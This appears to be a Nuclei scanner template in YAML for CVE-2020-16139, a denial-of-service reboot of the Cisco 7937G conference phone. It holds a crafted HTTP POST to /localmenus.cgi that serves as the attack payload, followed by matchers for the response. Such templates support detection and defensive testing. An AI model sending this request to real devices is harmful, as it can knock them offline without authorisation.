30 lines
1.2 KiB
YAML
30 lines
1.2 KiB
YAML
id: CVE-2020-16139
|
|
|
|
info:
|
|
name: Cisco 7937G Denial-of-Service Reboot Attack
|
|
author: pikpikcu
|
|
severity: low
|
|
description: |
|
|
A denial-of-service in Cisco Unified IP Conference Station 7937G 1-4-4-0 through 1-4-5-7 allows attackers restart the device remotely through sending specially crafted packets. Note: We cannot prove this vulnerability exists. Out of an abundance of caution, this CVE is being assigned to better serve our customers and ensure all who are still running this product understand that the product is end of life and should be removed or upgraded.
|
|
reference: https://blacklanternsecurity.com/2020-08-07-Cisco-Unified-IP-Conference-Station-7937G/
|
|
tags: cve,cve2020,dos,cisco
|
|
|
|
requests:
|
|
- raw:
|
|
- |
|
|
POST /localmenus.cgi?func=609&rphl=1&data=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1
|
|
Host: {{Hostname}}
|
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: status
|
|
status:
|
|
- 200
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "application/xml"
|
|
- type: word
|
|
words:
|
|
- 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' |